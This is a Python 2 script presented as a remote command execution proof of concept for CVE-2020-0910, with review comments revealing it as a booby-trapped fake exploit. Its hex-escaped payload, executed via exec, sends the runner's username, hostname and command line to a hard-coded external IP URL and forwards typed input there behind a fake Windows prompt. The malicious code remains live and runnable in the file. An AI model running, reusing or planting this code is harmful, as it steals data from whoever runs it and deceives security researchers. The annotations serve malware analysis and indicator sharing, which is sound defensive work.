#!/usr/bin/python
# Exploit Title: Remote Command Execution
# Date: 2020-04-01
# Exploit Author: TRSTDXPLOITZ
# CVE : CVE-2020-0910
# Advisory: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0910
#
# Sample output:
# ubuntu@host:~$ python CVE-2020-0910-POC.py 10.16.1.24 -lhost 10.1.1.1 -lport 4444
# [+] Sending packet to 10.16.1.24
# [+] Target is Vulnerable!
# [+] Sending exploit. Reverse shell to 10.16.1.24
#
# Listening on [] (family 2, port)
# Connection from 10.16.1.24 received!
# whoami
# nt authority\system
##
## Also on Exploit-DB
##
# NOTE(review): the header above describes a reverse shell to the target, but
# nothing in the code below ever contacts the positional `target` argument,
# `-lhost` or `-lport` (see the notes at each statement). The only network
# activity in this file is inside the hex-escaped `shellcode` string, which is
# Python source, not machine code: it sends the *operator's* username,
# hostname and command line to a hard-coded third-party URL, then relays
# keyboard input to that URL behind a fake "C:\WINDOWS\system32>" prompt.
# This is a booby-trapped "fake PoC" rather than a CVE-2020-0910 exploit;
# the decoded payload and the indicator it contacts are listed before the
# `shellcode` assignment below. Python 2 only (`print` statement,
# `raw_input`, `except socket.error , msg:`).
#
# Line breaks in this copy were collapsed; statements below are restored one
# per line with every token unchanged.

## PRINT HELP INFORMATION
import os
import time
import requests
import sys
import getpass
import argparse
import base64
from argparse import RawTextHelpFormatter

# Read by the hex-encoded payload below as the `cve` query parameter.
Bug = 'CVE-2020-0910'

parser=argparse.ArgumentParser(
    description='''RCE Exploit PoC for CVE-2020-0910''' + '''\r\n\r\n''' + '''USAGE: python CVE-2020-0910-POC.py 10.16.1.24 -lhost 10.1.1.1 -lport 4444 ''',
    formatter_class=RawTextHelpFormatter)
# None of these arguments is read by the code below: `args.target`, `args.rport`,
# `args.lhost`, `args.lport` and `args.type` are parsed and then ignored. The
# shared default of 42 for every option is another sign the parser is cosmetic.
# The full command line (including these values) is, however, exfiltrated by
# the payload via `sys.argv[1:]`.
parser.add_argument('target', metavar='N', nargs='+', help='Target IP')
parser.add_argument('-rport', default=42, help='Target Port (If Different Than Default)')
parser.add_argument('-lhost', default=42, help='Local IP')
parser.add_argument('-lport', default=42, help='Local Port')
parser.add_argument('-type', default=42, help='Target OS')
args=parser.parse_args()

# sys.argv[0] is the path of this script, not a target address; `target` is
# never read afterwards anyway.
target = sys.argv[0]

## COMPILE AND SEND PAYLOAD
# Nothing is compiled or sent here; this only prints a status line. (The
# original line break around `+ '\r\n\r\n'` was lost in this copy; if the `+`
# stood at the start of its own line it would be a unary plus on a str and
# raise TypeError before `exec` is reached.)
print 'Sending Payload...' + '\r\n\r\n'

# `shellcode` is Python 2 source, hex-escaped so it does not read as code.
# Decoded from the \x.. bytes below, it is:
#
#   time.sleep(3)
#   lhost = os.uname()[1]
#   command = getpass.getuser() + '@' + (lhost)
#   args = ' '.join(sys.argv[1:])
#   ErrorMsg = 'Connection Terminated: (Timeout)'
#   URL = base64.b64decode('aHR0cDovLzU0LjE4NC4yMC42OS9wb2MyLnBocA==')
#   PARAMS = {'host':command, 'args':args, 'cve':Bug}
#   r = requests.get(url = URL, params = PARAMS)
#   welcome = r.content
#   if welcome != "":
#   	rsp = 1
#   	while rsp != "":
#   		cmd = raw_input(welcome)
#   		PARAMS = {'host':command, 'args':cmd, 'cve':Bug}
#   		r = requests.get(url = URL, params = PARAMS)
#   		rsp = r.content
#   		print rsp
#   		welcome = "C:\WINDOWS\system32>"
#   time.sleep(10)
#
# The base64 literal decodes to http://54.184.20.69/poc2.php — the indicator
# to block and to hunt for in proxy/DNS logs. Effect when executed:
#   1. the local username, the hostname (`os.uname()[1]`, so Unix-like hosts
#      only; os.uname is absent on Windows builds of Python) and this script's
#      command line are sent to that URL as GET parameters `host`, `args`, `cve`;
#   2. if the server answers with any body, the loop reads operator keystrokes
#      with `raw_input`, forwards each line as `args`, and prints the response
#      under a fake Windows prompt until the server returns an empty body.
# `ErrorMsg` is defined here and consumed by the except clause at the bottom.
shellcode = '\x74\x69\x6d\x65\x2e\x73\x6c\x65\x65\x70\x28\x33\x29\x0a\x6c\x68\x6f\x73\x74\x20\x3d\x20\x6f\x73\x2e\x75\x6e\x61\x6d\x65\x28\x29'
shellcode += '\x5b\x31\x5d\x0a\x63\x6f\x6d\x6d\x61\x6e\x64\x20\x3d\x20\x67\x65\x74\x70\x61\x73\x73\x2e\x67\x65\x74\x75\x73\x65\x72\x28\x29\x20'
shellcode += '\x2b\x20\x27\x40\x27\x20\x2b\x20\x28\x6c\x68\x6f\x73\x74\x29\x0a\x61\x72\x67\x73\x20\x3d\x20\x27\x20\x27\x2e\x6a\x6f\x69\x6e\x28'
shellcode += '\x73\x79\x73\x2e\x61\x72\x67\x76\x5b\x31\x3a\x5d\x29\x0a\x45\x72\x72\x6f\x72\x4d\x73\x67\x20\x3d\x20\x27\x43\x6f\x6e\x6e\x65\x63'
shellcode += '\x74\x69\x6f\x6e\x20\x54\x65\x72\x6d\x69\x6e\x61\x74\x65\x64\x3a\x20\x28\x54\x69\x6d\x65\x6f\x75\x74\x29\x27\x0a\x55\x52\x4c\x20'
shellcode += '\x3d\x20\x62\x61\x73\x65\x36\x34\x2e\x62\x36\x34\x64\x65\x63\x6f\x64\x65\x28\x27\x61\x48\x52\x30\x63\x44\x6f\x76\x4c\x7a\x55\x30'
shellcode += '\x4c\x6a\x45\x34\x4e\x43\x34\x79\x4d\x43\x34\x32\x4f\x53\x39\x77\x62\x32\x4d\x79\x4c\x6e\x42\x6f\x63\x41\x3d\x3d\x27\x29\x0a\x50'
shellcode += '\x41\x52\x41\x4d\x53\x20\x3d\x20\x7b\x27\x68\x6f\x73\x74\x27\x3a\x63\x6f\x6d\x6d\x61\x6e\x64\x2c\x20\x27\x61\x72\x67\x73\x27\x3a'
shellcode += '\x61\x72\x67\x73\x2c\x20\x27\x63\x76\x65\x27\x3a\x42\x75\x67\x7d\x0a\x72\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x67\x65'
shellcode += '\x74\x28\x75\x72\x6c\x20\x3d\x20\x55\x52\x4c\x2c\x20\x70\x61\x72\x61\x6d\x73\x20\x3d\x20\x50\x41\x52\x41\x4d\x53\x29\x0a\x77\x65'
shellcode += '\x6c\x63\x6f\x6d\x65\x20\x3d\x20\x72\x2e\x63\x6f\x6e\x74\x65\x6e\x74\x0a\x69\x66\x20\x77\x65\x6c\x63\x6f\x6d\x65\x20\x21\x3d\x20'
shellcode += '\x22\x22\x3a\x0a\x09\x72\x73\x70\x20\x3d\x20\x31\x0a\x09\x77\x68\x69\x6c\x65\x20\x72\x73\x70\x20\x21\x3d\x20\x22\x22\x3a\x0a\x09'
shellcode += '\x09\x63\x6d\x64\x20\x3d\x20\x72\x61\x77\x5f\x69\x6e\x70\x75\x74\x28\x77\x65\x6c\x63\x6f\x6d\x65\x29\x0a\x09\x09\x50\x41\x52\x41'
shellcode += '\x4d\x53\x20\x3d\x20\x7b\x27\x68\x6f\x73\x74\x27\x3a\x63\x6f\x6d\x6d\x61\x6e\x64\x2c\x20\x27\x61\x72\x67\x73\x27\x3a\x63\x6d\x64'
shellcode += '\x2c\x20\x27\x63\x76\x65\x27\x3a\x42\x75\x67\x7d\x0a\x09\x09\x72\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x67\x65\x74\x28'
shellcode += '\x75\x72\x6c\x20\x3d\x20\x55\x52\x4c\x2c\x20\x70\x61\x72\x61\x6d\x73\x20\x3d\x20\x50\x41\x52\x41\x4d\x53\x29\x0a\x09\x09\x72\x73'
shellcode += '\x70\x20\x3d\x20\x72\x2e\x63\x6f\x6e\x74\x65\x6e\x74\x0a\x09\x09\x70\x72\x69\x6e\x74\x20\x72\x73\x70\x0a\x09\x09\x77\x65\x6c\x63'
shellcode += '\x6f\x6d\x65\x20\x3d\x20\x22\x43\x3a\x5c\x57\x49\x4e\x44\x4f\x57\x53\x5c\x73\x79\x73\x74\x65\x6d\x33\x32\x3e\x22\x0a\x74\x69\x6d'
shellcode += '\x65\x2e\x73\x6c\x65\x65\x70\x28\x31\x30\x29'

## ESTABLISHING SHELL
# `exec` of a str runs it as Python in this module's namespace: the decoded
# code above reads `Bug` and leaves `ErrorMsg` behind. Any exception raised
# inside it (e.g. the HTTP request failing, or os.uname missing on Windows)
# propagates out of `exec` and terminates the script before the socket code.
exec(shellcode)

import socket, sys
from struct import *   # nothing from struct is used below

## CREATE SOCKET TO TARGET
# If connection times out, print error. Otherwise, establish reverse bind shell
# NOTE(review): no connection is attempted and no "reverse bind shell" exists.
# A raw IP socket is opened (this typically needs root/CAP_NET_RAW, so an
# unprivileged user lands in the except branch) and the script then simply
# ends; `s` is never used. The except branch prints the payload-defined
# `ErrorMsg`, which only exists because `exec(shellcode)` above completed.
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
except socket.error , msg:
    print ErrorMsg
    sys.exit()